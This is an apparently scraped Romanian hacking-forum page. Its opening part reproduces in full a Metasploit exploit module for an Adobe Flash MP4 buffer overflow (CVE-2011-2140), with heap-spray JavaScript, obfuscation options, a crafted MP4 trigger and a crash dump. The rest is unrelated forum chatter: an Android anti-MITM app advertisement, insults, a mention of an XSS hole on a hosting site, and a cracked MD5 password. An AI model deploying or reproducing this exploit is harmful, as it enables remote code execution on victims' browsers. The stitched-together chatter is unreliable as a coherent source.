mengele

este cam veche

This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', #RCA 'Abysssec', #PoC 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2011-2140' ], [ 'BID', '49083' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ], [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ], [ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ], [ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ] ], 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'ExitFunction' => "seh", 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 9 2011", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']), OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player']) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] elsif agent =~ /MSIE 7/ return targets[2] else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}") send_not_found(cli) return end # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...") #print_error("Sorry, not sending you the mp4 for now") #send_not_found(cli) send_response(cli, @mp4, {'Content-Type'=>'video/mp4'}) return end # Set payload depending on target p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } JS js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4" swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true?=video.jpg&file=#{mp4_uri}" html = %Q| <html> <head> <script> #{js} </script> </head> <body> <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}"> <param name="movie" value="#{swf_uri}"> </object> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @mp4 = create_mp4 super end def create_mp4 ftypAtom = "\x00\x00\x00\x20" #Size ftypAtom << "ftypisom" ftypAtom << "\x00\x00\x02\x00" ftypAtom << "isomiso2avc1mp41" mdatAtom = "\x00\x00\x00\x10" #Size mdatAtom << "mdat" mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF" moovAtom1 = "\x00\x00\x08\x83" #Size moovAtom1 << "moov" #Move header box header moovAtom1 << "\x00\x00\x00" moovAtom1 << "lmvhd" # Type moovAtom1 << "\x00\x00\x00\x00" # Version/Flags moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x03\xE8" # Time scale moovAtom1 << "\x00\x00\x2F\x80" # Duration moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA" moovAtom1 << "trak" # Track box header moovAtom1 << "\x00\x00\x00\x5C" moovAtom1 << "tkhd" moovAtom1 << "\x00\x00\x00\x0F" moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02" moovAtom1 << "rmdia" moovAtom1 << "\x00\x00\x00\x20" # Size moovAtom1 << "mdhd" # Media header box moovAtom1 << "\x00\x00\x00\x00" # Version/Flags moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x00\x01" # Time scale moovAtom1 << "\x00\x00\x00\x0C" # Duration moovAtom1 << "\x55\xC4\x00\x00" moovAtom1 << "\x00\x00\x00\x2D" # Size moovAtom1 << "hdlr" # Handler Reference header moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "vide" # Handler type moovAtom1 << "\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "VideoHandler" # Handler name moovAtom1 << "\x00\x00\x00\x02\x1D" moovAtom1 << "minf" moovAtom1 << "\x00\x00\x00\x14" moovAtom1 << "vmhd" moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24" moovAtom1 << "dinf" # Data information box header moovAtom1 << "\x00\x00\x00\x1c" moovAtom1 << "dref" # Data reference box moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" moovAtom1 << "\x00\x00\x00\x0C" # Size moovAtom1 << "url " # Data entry URL box moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags moovAtom1 << "\x00\x00\x09\xDD" # Size moovAtom1 << "stbl" moovAtom1 << "\x00\x00\x08\x99" moovAtom1 << "stsd" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" moovAtom1 << "\x00\x00\x08\x89" # Size moovAtom1 << "avc1" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x01\x42" # Width moovAtom1 << "\x01\x42" # Height moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x18" # Depth moovAtom1 << "\xFF\xFF" moovAtom1 << "\x00\x00\x08\x33" # Size moovAtom1 << "avcC" moovAtom1 << "\x01" # Config version moovAtom1 << "\x64" # Avc profile indication moovAtom1 << "\x00" # Compatibility moovAtom1 << "\x15" # Avc level indication moovAtom1 << "\xFF\xE1" # Although the fields have different values, they all become 0x0c0c0c0c # in memory. cycle = "\x00\x00\x00" cycle << "\x30\x30\x30\x30" #6th cycle << "\x00\x00\x00" cycle << "\x18\x18\x18\x18" #7th cycle << "\x00\x00\x00" cycle << "\x0c\x0c\x0c\x0c" #8th cycle << "\x00\x00\x00" cycle << "\x06\x06\x06\x06" #1st cycle << "\x00\x00\x00" cycle << "\x03\x03\x03\x03" cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00" cycle << "\xc0\xc0\xc0\xc0" # 4th cycle << "\x00\x00\x00" cycle << "\x60\x60\x60\x60" spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF" spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC" spsunit << cycle * 35 spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C" moovAtom2 = "\x00\x00\x00\x18" moovAtom2 << "stts" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01" moovAtom2 << "\x00\x00\x00\x14" moovAtom2 << "stss" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" moovAtom2 << "pctts" moovAtom2 << "\x00\x00\x00\x00\x00\x00" moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02" moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00" moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02" moovAtom2 << "\x00\x00\x00\x1C" moovAtom2 << "stsc" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01" moovAtom2 << "\x00\x00\x00\x44" moovAtom2 << "stsz" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07" moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39" moovAtom2 << "\x00\x00\x00\x40" moovAtom2 << "stco" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4" moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5" moovAtom = moovAtom1 + spsunit + moovAtom2 m = ftypAtom + mdatAtom + moovAtom return m end end =begin C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx Flash10u+0x5b4e8: Missing image name, possible paged-out or corrupt data. 1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d 0:008> !exchain 020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c) ECX points to 0x0c0c0c0c at the time of the crash: 0:008> r eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246 <Unloaded_ud.drv>+0xc0c0c0b: 0c0c0c0c ?? ??? Example of SWF player URI: http://www.jeroenwijering.com/embed/mediaplayer.swf To-do: IE 8 target =end Sursa

Deci cu ce texte obosite vin astia de la Goagle de te doare mintea...bine ca nu te intreaba si cum il cheama pe catzelusul tau..."Multumiri pentru congresmanii americani" ... mi se fix rupe mie de ei si de ACTA si de PIPA si de SOPA. Goagle takeaction!

Asta e munca de "chinez"...

The only app that is able to countermeasure "Man In The Middle" attacks on Android platform - Wifi Protector. No other app provides this type of high network security. Protects your phone from tools like FaceNiff, Cain & Abel, ANTI, ettercap, DroidSheep, NetCut, and all others that try to hijack your session via "Man In The Middle" through ARP spoofing / ARP poisoning. Don't allow such tools to break your privacy and steal your data. You can defend yourself with a single app. Alows secure usage of Facebook, Twitter, LinkedIn, Live.com, eBay ... WifiKill can't take you offline with this app installed. The "Immunity" feature is the only one that requires root, all other features work without root access. Features - Uses very few resources - Uses no resources if Wi-Fi is disabled - Nearly zero battery consumption - Requires very few permissions. Requests only absolutely necessary permissions - Undetectable by the bad guy - 100% silent and passive inside the network. Generates no noise - Highly customizable notifications - Plays ringtone on attack (optional) - Vibrates in a given pattern on attack (optional) - Easy to use one-click-interface as well as detailed network view for experts - "Immunity" protects you without disabling Wi-Fi (root required) - Can also disable Wi-Fi if you don't have root access to your phone - Logging of all spoofing attempts with details about the network and the attacker - Works in complex wireless LANs, like vWLAN and WDS (please see FAQ) - Detects networks already under attack Download: Android Market Source: Android Market

Tu ori nu stii sa citesti ori esti batut in cap?...Decrypt Page Nu stiu la ce ti-ar folosi asta daca tu habar nu ai cum sa citesti un simplu hash in md5. pass >> incompetentuseriam

La cum au avansat referitor la DM cred ca si un utilizator de windoze cat de cat novice se descurca cu oricare dintre ele in DM. Cred ca Slack-ul te-ar "forta" sa inveti unix...

Nu ma pricep deloc la pariuri , nu am jucat niciodata dar stiu ca, casele de pariuri nu pierd niciodata si din cate mai stiu ratele de castig se bazeaza pe niste probabilitati...cum draq imi garantezi tu mie 100% castig? Sa inteleg ca ala mituieste cluburile?...antrenorii? sau este Nostradamus? Exagerezi sincer...daca ai castigat azi 40RON maine poti sa pierzi 400RON...

Eu sunt PRO Flattr...este destul de bine implementat sistemul...dar daca poti sa il faci de asa natura sa apara doar pe posturile care le consideri interesante si care merita votate.

"Bai Inteligeeentule!" ... nu ma iau de tine ca imi esti simpatic parca ziceai ca te-ai retras...vad ca tot te arde buza

sunt multi pe care nu ii duce capul nici la asta crede-ma...daca o sa te uiti in Trash o sa gasesti thread-uri cu intrebari idioate la care foarte simplu gaseau raspunsurile si pe Google.

Am incercat sa fac o analiza zilnica a forumului si in ultima vreme au aparut o gramada de posturi ale unor babuini despre care cred ca au aterizat din greseala pe aici sau prietenul lor Google i-a ejectat aici tot din motive de offtopic-uri/post-uri cretine indexate. Daca stai sa cauti "xxx" on google.ro imposibil sa nu gasesti un link catre RST? Oare de ce? Imi aduc aminte in trecut ca stateam de placere sa rasfoiesc cate un thread deoarece fiecare continea cate ceva interesant, acum... La inregistrare setati un test cu 2, 3 intrebari de cultura generala...ca au inceput sa se inregistreze toti babuinii care nici macar nu stiu sa scrie corect iar pe deasupra dupa o intrebare imbecila pe care o pun daca ii mustrezi putin ca nu s-au exprimat corect se mai apuca sa te mai si ia la pwla. So don't STOP ACTA....STOP BABUINS

idee buna...asa probabil o sa apara si posturile de calitate referitor la proiectele/programele postate cred ca ar trebuii sa infiintati si un fel de "Team Testers" ca nu te poti lua dupa "Likes" sau parerile unora care dau Like si la un thread in care este postat "caca maka"...iar respectivele proiecte sa fie cat de cat evaluate de acest team si pe urma publicate...asta pentru a evita transformarea RST intr-un fel de Feisbuci sau Sourceforge. Cred ca este mai simplu un fel de thread in care sa poti publica dar sa nu apara decat atunci dupa ce adminii il analizeaza, testeaza, iar daca considera ca este de calitate sa ii dea drumu...sau sa se adauge Flattr button doar in thread-urile in care considera echipa de testeri/evaluatori/admini ca merita sa primeasca voturi. @begood poate te trezesti in situatia sa iti dai tot salariul actual si sa mai aduci niste bani si de acasa sa platesti oamenii (jkidding Multa bafta, ideea este excelenta dar mai trebuie analizata...

Read that: How to made a radio SERVAR Daca nu te descurci deschide-o in Chrome are translate tool

congratz!

e plin youtube-ul de phishere de astea... or This...

...si daca "Baiatul ala destept"...pe care il cauti tu iti "trosneste" prietena...o sa deschizi un post pe www[dot]bataie-la-comanda[dot]com sa il cauti pe "Baiatul destept" ? @tex cred ca in curand o sa trebuiasca sa faceti un thread si cu cele mai penale reply-uri

patetic... ala care a dat interviul sa uitat prea mult la Cartoon Network...

Stai linistit...atat timp cat ii violeaza intimitatea doar si nu si pe ea nu ai de ce sa iti faci griji Las-o mai incet cu cybersex-ul pe yahoo cu fata ca omori serverul Ai cam tras chiulul la "lucru manual" in generala se vede si incerci sa recuperezi acum

Link test

sssst...

Eu acum am vazut postul asta si am dat o geana pe site-ul ala...

IntelHost Solutions - Inregistrare domenii XSS on search dude wtf ... ceeace ai postat tu mai sus se numeste CULMEA TUPEULUI ... dupa ce ca esti prost...mai si semnalizezi...

welcome in the club

Danke ... Pentru RATONI: Encrypt or Decrypt BASE-64 online. Use this online form to encode plain text to BASE-64 or decode BASE-64 to plain text. Daca nu reusiti copy/paste incercati Ctrl+C/Ctrl+V